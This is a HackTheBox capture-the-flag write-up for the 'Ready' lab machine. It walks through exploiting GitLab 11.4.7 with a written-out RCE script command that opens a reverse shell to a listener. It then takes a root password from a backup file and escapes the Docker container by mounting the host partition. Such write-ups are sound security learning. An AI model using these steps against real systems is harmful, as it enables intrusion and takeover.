HackTheBox - Ready

Erik
Written by Erik on
HackTheBox - Ready

Linux machine medium level

Table of Contents

  1. Enumeration
  2. Explotation
  3. Privilege Escalation

Enumeration:

Ports:

  • 22 SSH
  • 5080 HTTP “GitLab”

Gitlab

Before login we must be registered:

http://10.10.10.220:5080/users/sign_in

RegisterLogin

While looking at Gitlab I realized that I had version 11.4.7 and I found an RCE that is available.

Searchsploit

Explotation:

This exploit creates an rce in a gitlab project that gives us a reverseshell when executed.

python3 rce.py -u erik1 -p erik1234 -g http://10.10.10.220 -l 10.10.14.31 -P 1234

ExploitRCE

This exploit creates a project that offers us a reverse shell, we open the project to execute the reverse.

Listening on the port indicated in the exploit:

ReverseShell

Privilege Escalation:

The user flag can be found in “/home/dude/user.txt”.

UserFlag

In the path /opt/backups/gitlab.rb we will find a backup with the root password of the container.

FindPasswordRoot

We use the password that we have found in the backup and access the root user.

LoginRoot

Being inside a docker we will have to try to collect information outside of it, for this we will do the following:

We mount the container host partition to be able to view it, there we will find the flag:

MountDocker

RootFlag

Machine Completed

Erik

Erik

Hi! Im Erik I love computer security and in my spare time I do bug bounty or research.
Every day I try to learn something new, no matter how small it is.

Explore more like this

HTB CVE HTB Linux
HackTheBox - Poison

HackTheBox - Poison

Linux machine medium level

Erik Erik 26 Jun 2021
HackTheBox - Valentine

HackTheBox - Valentine

Linux machine easy level

Erik Erik 24 Jun 2021
HackTheBox - Shocker

HackTheBox - Shocker

Linux machine easy level

Erik Erik 23 Jun 2021